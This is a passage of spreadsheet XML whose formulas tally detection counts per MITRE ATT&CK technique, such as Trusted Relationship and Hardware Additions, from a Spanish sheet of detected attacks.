        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B35,'Tabla 2 - Ataques detec (Imple)'!$AV$3:$AV$112)</f>
        <v>10</v>
      </c>
      <c r="BG35" s="13">
        <f>AVERAGEIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B35,'Tabla 2 - Ataques detec (Imple)'!$AX$3:$AX$112)</f>
        <v>1</v>
      </c>
      <c r="BH35" s="394">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B35,'Tabla 2 - Ataques detec (Imple)'!$AW$3:$AW$112)</f>
        <v>13</v>
      </c>
      <c r="BI35" s="292">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B35,'Tabla 2 - Ataques detec (Imple)'!AY$3:AY$112)</f>
        <v>13</v>
      </c>
      <c r="BJ35" s="322">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B35,'Tabla 2 - Ataques detec (Imple)'!AZ$3:AZ$112)</f>
        <v>11</v>
      </c>
      <c r="BK35" s="322" t="str">
        <f t="shared" si="9"/>
        <v>11 (13)</v>
      </c>
      <c r="BL35" s="12">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B35,'Tabla 2 - Ataques detec (Imple)'!BA$3:BA$112)</f>
        <v>3</v>
      </c>
      <c r="BM35" s="13">
        <f>AVERAGEIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B35,'Tabla 2 - Ataques detec (Imple)'!$BC$3:$BC$112)</f>
        <v>1</v>
      </c>
      <c r="BN35" s="394">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B35,'Tabla 2 - Ataques detec (Imple)'!$BB$3:$BB$112)</f>
        <v>10</v>
      </c>
      <c r="BO35" s="288">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B35,'Tabla 2 - Ataques detec (Imple)'!BD$3:BD$112)</f>
        <v>40</v>
      </c>
      <c r="BP35" s="4">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B35,'Tabla 2 - Ataques detec (Imple)'!BE$3:BE$112)</f>
        <v>34</v>
      </c>
      <c r="BQ35" s="4" t="str">
        <f t="shared" si="10"/>
        <v>34 (40)</v>
      </c>
      <c r="BR35" s="4">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B35,'Tabla 2 - Ataques detec (Imple)'!BF$3:BF$112)</f>
        <v>3</v>
      </c>
      <c r="BS35" s="4">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B35,'Tabla 2 - Ataques detec (Imple)'!BG$3:BG$112)</f>
        <v>7</v>
      </c>
      <c r="BT35" s="13">
        <f>AVERAGEIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B35,'Tabla 2 - Ataques detec (Imple)'!$BI$3:$BI$112)</f>
        <v>1</v>
      </c>
      <c r="BU35" s="394">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B35,'Tabla 2 - Ataques detec (Imple)'!$BH$3:$BH$112)</f>
        <v>25</v>
      </c>
      <c r="BV35" s="292">
        <v>8</v>
      </c>
      <c r="BW35" s="322">
        <v>8</v>
      </c>
      <c r="BX35" s="4" t="str">
        <f t="shared" si="11"/>
        <v>8 (8)</v>
      </c>
      <c r="BY35" s="12">
        <v>1</v>
      </c>
      <c r="BZ35" s="13">
        <v>1</v>
      </c>
      <c r="CA35" s="394">
        <v>8</v>
      </c>
      <c r="CB35" s="288">
        <v>16</v>
      </c>
      <c r="CC35" s="4">
        <v>16</v>
      </c>
      <c r="CD35" s="4" t="str">
        <f t="shared" si="12"/>
        <v>16 (16)</v>
      </c>
      <c r="CE35" s="4">
        <v>1</v>
      </c>
      <c r="CF35" s="4">
        <v>1</v>
      </c>
      <c r="CG35" s="13">
        <v>1</v>
      </c>
      <c r="CH35" s="394">
        <v>8</v>
      </c>
    </row>
    <row r="36" spans="1:86" s="5" customFormat="1" ht="15" customHeight="1">
      <c r="A36" s="4">
        <f t="shared" si="13"/>
        <v>34</v>
      </c>
      <c r="B36" s="4" t="str">
        <f>IFERROR(VLOOKUP(A36,'Tabla 2 - Ataques detec (Imple)'!$B$3:$D$112,3,FALSE),"")</f>
        <v>T1199</v>
      </c>
      <c r="C36" s="493" t="str">
        <f>IFERROR(VLOOKUP(B36,Techniques!$B$3:$H$213,2,FALSE),"")</f>
        <v>Trusted Relationship</v>
      </c>
      <c r="D36" s="493">
        <f>SUMPRODUCT(
  ('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112=$B36)*
  (LEN('Tabla 2 - Ataques detec (Imple)'!$C$3:$C$112)&gt;0)
)</f>
        <v>1</v>
      </c>
      <c r="E36" s="493">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B36,'Tabla 2 - Ataques detec (Imple)'!$E$3:$E$112)</f>
        <v>18</v>
      </c>
      <c r="F36" s="579" t="str">
        <f t="shared" si="14"/>
        <v>1 (18)</v>
      </c>
      <c r="G36" s="292">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B36,'Tabla 2 - Ataques detec (Imple)'!F$3:F$112)</f>
        <v>6</v>
      </c>
      <c r="H36" s="322">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B36,'Tabla 2 - Ataques detec (Imple)'!G$3:G$112)</f>
        <v>1</v>
      </c>
      <c r="I36" s="322" t="str">
        <f t="shared" si="0"/>
        <v>1 (6)</v>
      </c>
      <c r="J36" s="12">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B36,'Tabla 2 - Ataques detec (Imple)'!$H$3:$H$112)</f>
        <v>1</v>
      </c>
      <c r="K36" s="13">
        <f>AVERAGEIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B36,'Tabla 2 - Ataques detec (Imple)'!$J$3:$J$112)</f>
        <v>1</v>
      </c>
      <c r="L36" s="394">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B36,'Tabla 2 - Ataques detec (Imple)'!$I$3:$I$112)</f>
        <v>1</v>
      </c>
      <c r="M36" s="322">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B36,'Tabla 2 - Ataques detec (Imple)'!K$3:K$112)</f>
        <v>2</v>
      </c>
      <c r="N36" s="322">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B36,'Tabla 2 - Ataques detec (Imple)'!L$3:L$112)</f>
        <v>2</v>
      </c>
      <c r="O36" s="322" t="str">
        <f t="shared" si="1"/>
        <v>2 (2)</v>
      </c>
      <c r="P36" s="12">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B36,'Tabla 2 - Ataques detec (Imple)'!$M$3:$M$112)</f>
        <v>1</v>
      </c>
      <c r="Q36" s="13">
        <f>AVERAGEIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B36,'Tabla 2 - Ataques detec (Imple)'!$O$3:$O$112)</f>
        <v>1</v>
      </c>
      <c r="R36" s="394">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B36,'Tabla 2 - Ataques detec (Imple)'!$N$3:$N$112)</f>
        <v>2</v>
      </c>
      <c r="S36" s="409">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B36,'Tabla 2 - Ataques detec (Imple)'!P$3:P$112)</f>
        <v>8</v>
      </c>
      <c r="T36" s="4">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B36,'Tabla 2 - Ataques detec (Imple)'!Q$3:Q$112)</f>
        <v>3</v>
      </c>
      <c r="U36" s="4" t="str">
        <f t="shared" si="2"/>
        <v>3 (8)</v>
      </c>
      <c r="V36" s="4">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B36,'Tabla 2 - Ataques detec (Imple)'!$R$3:$R$112)</f>
        <v>2</v>
      </c>
      <c r="W36" s="13">
        <f>AVERAGEIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B36,'Tabla 2 - Ataques detec (Imple)'!$T$3:$T$112)</f>
        <v>1</v>
      </c>
      <c r="X36" s="394">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B36,'Tabla 2 - Ataques detec (Imple)'!$S$3:$S$112)</f>
        <v>2</v>
      </c>
      <c r="Y36" s="392">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B36,'Tabla 2 - Ataques detec (Imple)'!U$3:U$112)</f>
        <v>9</v>
      </c>
      <c r="Z36" s="392">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B36,'Tabla 2 - Ataques detec (Imple)'!V$3:V$112)</f>
        <v>4</v>
      </c>
      <c r="AA36" s="322" t="str">
        <f t="shared" si="3"/>
        <v>4 (9)</v>
      </c>
      <c r="AB36" s="392">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B36,'Tabla 2 - Ataques detec (Imple)'!$R$3:$R$112)</f>
        <v>2</v>
      </c>
      <c r="AC36" s="16">
        <f>AVERAGEIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B36,'Tabla 2 - Ataques detec (Imple)'!$Y$3:$Y$112)</f>
        <v>1</v>
      </c>
      <c r="AD36" s="394">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B36,'Tabla 2 - Ataques detec (Imple)'!$X$3:$X$112)</f>
        <v>3</v>
      </c>
      <c r="AE36" s="392">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B36,'Tabla 2 - Ataques detec (Imple)'!Z$3:Z$112)</f>
        <v>17</v>
      </c>
      <c r="AF36" s="392">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B36,'Tabla 2 - Ataques detec (Imple)'!AA$3:AA$112)</f>
        <v>17</v>
      </c>
      <c r="AG36" s="322" t="str">
        <f t="shared" si="4"/>
        <v>17 (17)</v>
      </c>
      <c r="AH36" s="392">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B36,'Tabla 2 - Ataques detec (Imple)'!$AB$3:$AB$112)</f>
        <v>11</v>
      </c>
      <c r="AI36" s="16">
        <f>AVERAGEIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B36,'Tabla 2 - Ataques detec (Imple)'!$AD$3:$AD$112)</f>
        <v>1</v>
      </c>
      <c r="AJ36" s="394">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B36,'Tabla 2 - Ataques detec (Imple)'!$AC$3:$AC$112)</f>
        <v>5</v>
      </c>
      <c r="AK36" s="392">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B36,'Tabla 2 - Ataques detec (Imple)'!AE$3:AE$112)</f>
        <v>26</v>
      </c>
      <c r="AL36" s="392">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B36,'Tabla 2 - Ataques detec (Imple)'!AF$3:AF$112)</f>
        <v>21</v>
      </c>
      <c r="AM36" s="322" t="str">
        <f t="shared" si="5"/>
        <v>21 (26)</v>
      </c>
      <c r="AN36" s="392">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B36,'Tabla 2 - Ataques detec (Imple)'!$AG$3:$AG$112)</f>
        <v>14</v>
      </c>
      <c r="AO36" s="16">
        <f>AVERAGEIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B36,'Tabla 2 - Ataques detec (Imple)'!$AI$3:$AI$112)</f>
        <v>1</v>
      </c>
      <c r="AP36" s="394">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B36,'Tabla 2 - Ataques detec (Imple)'!$AH$3:$AH$112)</f>
        <v>5</v>
      </c>
      <c r="AQ36" s="292">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B36,'Tabla 2 - Ataques detec (Imple)'!AJ$3:AJ$112)</f>
        <v>0</v>
      </c>
      <c r="AR36" s="322">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B36,'Tabla 2 - Ataques detec (Imple)'!AK$3:AK$112)</f>
        <v>0</v>
      </c>
      <c r="AS36" s="322" t="str">
        <f t="shared" si="6"/>
        <v>0 (0)</v>
      </c>
      <c r="AT36" s="12">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B36,'Tabla 2 - Ataques detec (Imple)'!$AL$3:$AL$112)</f>
        <v>0</v>
      </c>
      <c r="AU36" s="13">
        <f>AVERAGEIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B36,'Tabla 2 - Ataques detec (Imple)'!$AN$3:$AN$112)</f>
        <v>0</v>
      </c>
      <c r="AV36" s="394">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B36,'Tabla 2 - Ataques detec (Imple)'!$AM$3:$AM$112)</f>
        <v>0</v>
      </c>
      <c r="AW36" s="392">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B36,'Tabla 2 - Ataques detec (Imple)'!AO$3:AO$112)</f>
        <v>3</v>
      </c>
      <c r="AX36" s="392">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B36,'Tabla 2 - Ataques detec (Imple)'!AP$3:AP$112)</f>
        <v>3</v>
      </c>
      <c r="AY36" s="322" t="str">
        <f t="shared" si="7"/>
        <v>3 (3)</v>
      </c>
      <c r="AZ36" s="392">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B36,'Tabla 2 - Ataques detec (Imple)'!$AQ$3:$AQ$112)</f>
        <v>2</v>
      </c>
      <c r="BA36" s="16">
        <f>AVERAGEIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B36,'Tabla 2 - Ataques detec (Imple)'!$AS$3:$AS$112)</f>
        <v>1</v>
      </c>
      <c r="BB36" s="394">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B36,'Tabla 2 - Ataques detec (Imple)'!$AR$3:$AR$112)</f>
        <v>3</v>
      </c>
      <c r="BC36" s="409">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B36,'Tabla 2 - Ataques detec (Imple)'!AT$3:AT$112)</f>
        <v>11</v>
      </c>
      <c r="BD36" s="4">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B36,'Tabla 2 - Ataques detec (Imple)'!AU$3:AU$112)</f>
        <v>6</v>
      </c>
      <c r="BE36" s="4" t="str">
        <f t="shared" si="8"/>
        <v>6 (11)</v>
      </c>
      <c r="BF36" s="4">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B36,'Tabla 2 - Ataques detec (Imple)'!$AV$3:$AV$112)</f>
        <v>4</v>
      </c>
      <c r="BG36" s="13">
        <f>AVERAGEIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B36,'Tabla 2 - Ataques detec (Imple)'!$AX$3:$AX$112)</f>
        <v>1</v>
      </c>
      <c r="BH36" s="394">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B36,'Tabla 2 - Ataques detec (Imple)'!$AW$3:$AW$112)</f>
        <v>3</v>
      </c>
      <c r="BI36" s="292">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B36,'Tabla 2 - Ataques detec (Imple)'!AY$3:AY$112)</f>
        <v>1</v>
      </c>
      <c r="BJ36" s="322">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B36,'Tabla 2 - Ataques detec (Imple)'!AZ$3:AZ$112)</f>
        <v>1</v>
      </c>
      <c r="BK36" s="322" t="str">
        <f t="shared" si="9"/>
        <v>1 (1)</v>
      </c>
      <c r="BL36" s="12">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B36,'Tabla 2 - Ataques detec (Imple)'!BA$3:BA$112)</f>
        <v>1</v>
      </c>
      <c r="BM36" s="13">
        <f>AVERAGEIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B36,'Tabla 2 - Ataques detec (Imple)'!$BC$3:$BC$112)</f>
        <v>1</v>
      </c>
      <c r="BN36" s="394">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B36,'Tabla 2 - Ataques detec (Imple)'!$BB$3:$BB$112)</f>
        <v>1</v>
      </c>
      <c r="BO36" s="288">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B36,'Tabla 2 - Ataques detec (Imple)'!BD$3:BD$112)</f>
        <v>11</v>
      </c>
      <c r="BP36" s="4">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B36,'Tabla 2 - Ataques detec (Imple)'!BE$3:BE$112)</f>
        <v>11</v>
      </c>
      <c r="BQ36" s="4" t="str">
        <f t="shared" si="10"/>
        <v>11 (11)</v>
      </c>
      <c r="BR36" s="4">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B36,'Tabla 2 - Ataques detec (Imple)'!BF$3:BF$112)</f>
        <v>1</v>
      </c>
      <c r="BS36" s="4">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B36,'Tabla 2 - Ataques detec (Imple)'!BG$3:BG$112)</f>
        <v>4</v>
      </c>
      <c r="BT36" s="13">
        <f>AVERAGEIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B36,'Tabla 2 - Ataques detec (Imple)'!$BI$3:$BI$112)</f>
        <v>1</v>
      </c>
      <c r="BU36" s="394">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B36,'Tabla 2 - Ataques detec (Imple)'!$BH$3:$BH$112)</f>
        <v>10</v>
      </c>
      <c r="BV36" s="292">
        <v>0</v>
      </c>
      <c r="BW36" s="322">
        <v>0</v>
      </c>
      <c r="BX36" s="4" t="str">
        <f t="shared" si="11"/>
        <v>0 (0)</v>
      </c>
      <c r="BY36" s="12">
        <v>0</v>
      </c>
      <c r="BZ36" s="13">
        <v>0</v>
      </c>
      <c r="CA36" s="394">
        <v>0</v>
      </c>
      <c r="CB36" s="288">
        <v>0</v>
      </c>
      <c r="CC36" s="4">
        <v>0</v>
      </c>
      <c r="CD36" s="4" t="str">
        <f t="shared" si="12"/>
        <v>0 (0)</v>
      </c>
      <c r="CE36" s="4">
        <v>0</v>
      </c>
      <c r="CF36" s="4">
        <v>0</v>
      </c>
      <c r="CG36" s="13">
        <v>0</v>
      </c>
      <c r="CH36" s="394">
        <v>0</v>
      </c>
    </row>
    <row r="37" spans="1:86" s="5" customFormat="1" ht="15" customHeight="1">
      <c r="A37" s="4">
        <f t="shared" si="13"/>
        <v>35</v>
      </c>
      <c r="B37" s="4" t="str">
        <f>IFERROR(VLOOKUP(A37,'Tabla 2 - Ataques detec (Imple)'!$B$3:$D$112,3,FALSE),"")</f>
        <v>T1200</v>
      </c>
      <c r="C37" s="493" t="str">
        <f>IFERROR(VLOOKUP(B37,Techniques!$B$3:$H$213,2,FALSE),"")</f>
        <v>Hardware Additions</v>
      </c>
      <c r="D37" s="493">
        <f>SUMPRODUCT(
  ('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112=$B37)*
  (LEN('Tabla 2 - Ataques detec (Imple)'!$C$3:$C$112)&gt;0)
)</f>
        <v>1</v>
      </c>
      <c r="E37" s="493">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B37,'Tabla 2 - Ataques detec (Imple)'!$E$3:$E$112)</f>
        <v>3</v>
      </c>
      <c r="F37" s="579" t="str">
        <f t="shared" si="14"/>
        <v>1 (3)</v>
      </c>
      <c r="G37" s="292">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B37,'Tabla 2 - Ataques detec (Imple)'!F$3:F$112)</f>
        <v>6</v>
      </c>
      <c r="H37" s="322">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B37,'Tabla 2 - Ataques detec (Imple)'!G$3:G$112)</f>
        <v>1</v>
      </c>
      <c r="I37" s="322" t="str">
        <f t="shared" si="0"/>
        <v>1 (6)</v>
      </c>
      <c r="J37" s="12">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B37,'Tabla 2 - Ataques detec (Imple)'!$H$3:$H$112)</f>
        <v>1</v>
      </c>
      <c r="K37" s="13">
        <f>AVERAGEIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B37,'Tabla 2 - Ataques detec (Imple)'!$J$3:$J$112)</f>
        <v>1</v>
      </c>
      <c r="L37" s="394">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B37,'Tabla 2 - Ataques detec (Imple)'!$I$3:$I$112)</f>
        <v>1</v>
      </c>
      <c r="M37" s="322">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B37,'Tabla 2 - Ataques detec (Imple)'!K$3:K$112)</f>
        <v>0</v>
      </c>
      <c r="N37" s="322">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B37,'Tabla 2 - Ataques detec (Imple)'!L$3:L$112)</f>
        <v>0</v>
      </c>
      <c r="O37" s="322" t="str">
        <f t="shared" si="1"/>
        <v>0 (0)</v>
      </c>
      <c r="P37" s="12">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B37,'Tabla 2 - Ataques detec (Imple)'!$M$3:$M$112)</f>
        <v>0</v>
      </c>
      <c r="Q37" s="13">
        <f>AVERAGEIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B37,'Tabla 2 - Ataques detec (Imple)'!$O$3:$O$112)</f>
        <v>0</v>
      </c>
      <c r="R37" s="394">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B37,'Tabla 2 - Ataques detec (Imple)'!$N$3:$N$112)</f>
        <v>0</v>
      </c>
      <c r="S37" s="409">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B37,'Tabla 2 - Ataques detec (Imple)'!P$3:P$112)</f>
        <v>6</v>
      </c>
      <c r="T37" s="4">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B37,'Tabla 2 - Ataques detec (Imple)'!Q$3:Q$112)</f>
        <v>1</v>
      </c>
      <c r="U37" s="4" t="str">
        <f t="shared" si="2"/>
        <v>1 (6)</v>
      </c>
      <c r="V37" s="4">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B37,'Tabla 2 - Ataques detec (Imple)'!$R$3:$R$112)</f>
        <v>1</v>
      </c>
      <c r="W37" s="13">
        <f>AVERAGEIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B37,'Tabla 2 - Ataques detec (Imple)'!$T$3:$T$112)</f>
        <v>1</v>
      </c>
      <c r="X37" s="394">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B37,'Tabla 2 - Ataques detec (Imple)'!$S$3:$S$112)</f>
        <v>1</v>
      </c>
      <c r="Y37" s="392">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B37,'Tabla 2 - Ataques detec (Imple)'!U$3:U$112)</f>
        <v>7</v>
      </c>
      <c r="Z37" s="392">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B37,'Tabla 2 - Ataques detec (Imple)'!V$3:V$112)</f>
        <v>2</v>
      </c>
      <c r="AA37" s="322" t="str">
        <f t="shared" si="3"/>
        <v>2 (7)</v>
      </c>
      <c r="AB37" s="392">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B37,'Tabla 2 - Ataques detec (Imple)'!$R$3:$R$112)</f>
        <v>1</v>
      </c>
      <c r="AC37" s="16">
        <f>AVERAGEIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B37,'Tabla 2 - Ataques detec (Imple)'!$Y$3:$Y$112)</f>
        <v>1</v>
      </c>
      <c r="AD37" s="394">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B37,'Tabla 2 - Ataques detec (Imple)'!$X$3:$X$112)</f>
        <v>1</v>
      </c>
      <c r="AE37" s="392">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B37,'Tabla 2 - Ataques detec (Imple)'!Z$3:Z$112)</f>
        <v>11</v>
      </c>
      <c r="AF37" s="392">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B37,'Tabla 2 - Ataques detec (Imple)'!AA$3:AA$112)</f>
        <v>4</v>
      </c>
      <c r="AG37" s="322" t="str">
        <f t="shared" si="4"/>
        <v>4 (11)</v>
      </c>
      <c r="AH37" s="392">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B37,'Tabla 2 - Ataques detec (Imple)'!$AB$3:$AB$112)</f>
        <v>4</v>
      </c>
      <c r="AI37" s="16">
        <f>AVERAGEIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B37,'Tabla 2 - Ataques detec (Imple)'!$AD$3:$AD$112)</f>
        <v>1</v>
      </c>
      <c r="AJ37" s="394">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B37,'Tabla 2 - Ataques detec (Imple)'!$AC$3:$AC$112)</f>
        <v>2</v>
      </c>
      <c r="AK37" s="392">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B37,'Tabla 2 - Ataques detec (Imple)'!AE$3:AE$112)</f>
        <v>18</v>
      </c>
      <c r="AL37" s="392">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B37,'Tabla 2 - Ataques detec (Imple)'!AF$3:AF$112)</f>
        <v>6</v>
      </c>
      <c r="AM37" s="322" t="str">
        <f t="shared" si="5"/>
        <v>6 (18)</v>
      </c>
      <c r="AN37" s="392">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B37,'Tabla 2 - Ataques detec (Imple)'!$AG$3:$AG$112)</f>
        <v>6</v>
      </c>
      <c r="AO37" s="16">
        <f>AVERAGEIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B37,'Tabla 2 - Ataques detec (Imple)'!$AI$3:$AI$112)</f>
        <v>1</v>
      </c>
      <c r="AP37" s="394">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B37,'Tabla 2 - Ataques detec (Imple)'!$AH$3:$AH$112)</f>
        <v>2</v>
      </c>
      <c r="AQ37" s="292">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B37,'Tabla 2 - Ataques detec (Imple)'!AJ$3:AJ$112)</f>
        <v>0</v>
      </c>
      <c r="AR37" s="322">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B37,'Tabla 2 - Ataques detec (Imple)'!AK$3:AK$112)</f>
        <v>0</v>
      </c>
      <c r="AS37" s="322" t="str">
        <f t="shared" si="6"/>
        <v>0 (0)</v>
      </c>
      <c r="AT37" s="12">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B37,'Tabla 2 - Ataques detec (Imple)'!$AL$3:$AL$112)</f>
        <v>0</v>
      </c>
      <c r="AU37" s="13">
        <f>AVERAGEIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B37,'Tabla 2 - Ataques detec (Imple)'!$AN$3:$AN$112)</f>
        <v>0</v>
      </c>
      <c r="AV37" s="394">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B37,'Tabla 2 - Ataques detec (Imple)'!$AM$3:$AM$112)</f>
        <v>0</v>
      </c>
      <c r="AW37" s="392">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B37,'Tabla 2 - Ataques detec (Imple)'!AO$3:AO$112)</f>
        <v>1</v>
      </c>
      <c r="AX37" s="392">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B37,'Tabla 2 - Ataques detec (Imple)'!AP$3:AP$112)</f>
        <v>1</v>
      </c>
      <c r="AY37" s="322" t="str">
        <f t="shared" si="7"/>
        <v>1 (1)</v>
      </c>
      <c r="AZ37" s="392">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B37,'Tabla 2 - Ataques detec (Imple)'!$AQ$3:$AQ$112)</f>
        <v>1</v>
      </c>
      <c r="BA37" s="16">
        <f>AVERAGEIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B37,'Tabla 2 - Ataques detec (Imple)'!$AS$3:$AS$112)</f>
        <v>1</v>
      </c>
      <c r="BB37" s="394">
